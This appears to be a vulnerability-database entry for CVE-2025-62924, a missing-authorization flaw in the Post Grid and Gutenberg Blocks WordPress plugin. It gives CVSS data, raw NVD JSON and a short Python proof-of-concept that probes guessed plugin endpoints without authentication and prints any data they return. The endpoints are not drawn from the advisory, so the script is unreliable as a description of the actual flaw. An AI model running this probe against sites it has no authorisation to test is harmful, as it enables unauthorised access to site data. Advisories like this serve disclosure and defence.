Security Vulnerability Report
中文
CVE-2025-62924 CVSS 6.5 MEDIUM

CVE-2025-62924

Published: 2025-10-27 02:15:52
Last Modified: 2026-04-28 22:16:23

Description

Missing Authorization vulnerability in PickPlugins Post Grid and Gutenberg Blocks post-grid allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Grid and Gutenberg Blocks: from n/a through <= 2.3.17.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PickPlugins Post Grid and Gutenberg Blocks <= 2.3.17(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62924 PoC - Missing Authorization in Post Grid Plugin # Target: WordPress site with Post Grid plugin <= 2.3.17 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-62924 Missing Authorization vulnerability in Post Grid plugin """ # Try to access post grid data without proper authorization endpoints = [ '/wp-json/post-grid/v2/get_post_grid_data', '/wp-json/post-grid/v2/posts', '/wp-admin/admin-ajax.php?action=post_grid_get_posts' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-62924 - Missing Authorization in Post Grid Plugin") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Low-privilege request (no authentication) response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if 'data' in data or 'posts' in data or len(data) > 0: print(f"[+] VULNERABLE: {url}") print(f"[+] Response: {data}") return True elif response.status_code == 403: print(f"[-] Protected: {url} (403 Forbidden)") except Exception as e: print(f"[!] Error testing {url}: {e}") print("[*] No vulnerable endpoints found or plugin not installed") return False if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62924", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:52.097", "lastModified": "2026-04-28T22:16:22.510", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in PickPlugins Post Grid and Gutenberg Blocks post-grid allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Post Grid and Gutenberg Blocks: from n/a through <= 2.3.17."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-17-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}